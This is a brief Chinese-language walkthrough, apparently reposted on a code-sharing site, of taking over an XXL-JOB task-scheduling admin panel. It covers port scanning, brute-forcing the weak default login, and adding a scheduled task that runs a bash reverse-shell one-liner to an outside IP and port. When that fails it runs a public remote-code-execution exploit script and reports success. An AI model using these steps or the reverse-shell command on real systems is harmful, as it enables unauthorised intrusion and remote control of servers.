XXL-JOB(任務調度中心)-反彈getshell


XXL-JOB(任務調度中心)-反彈getshell

常規掃描

image-20210121214518178

端口掃描掃出來9999 百度得出是xxl-job服務並爆出后台默認路徑

http://172.168.83.36:8080/xxl-job-admin/jobinfo

image-20210121214145057

后台登錄沒有驗證碼 嘗試爆破一下弱口令

image-20210121214852256

添加定時任務

image-20210121205831919

bash反彈命令

/bin/bash -i >& /dev/tcp/172.168.30.45/5555 0>&1

image-20210121210632122

命令執行不成功 bash會話並沒有反彈

下載漏洞exp

image-20210121215348959

python3 E:\xxl-job-rce-main\xxl-job-rce exe-code.py

image-20210121213936458

成功反彈

image-20210121214000399

參考

[1] https://github.com/mrknow001/xxl-job-rce

[2] https://www.cnblogs.com/kbhome/p/13210394.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM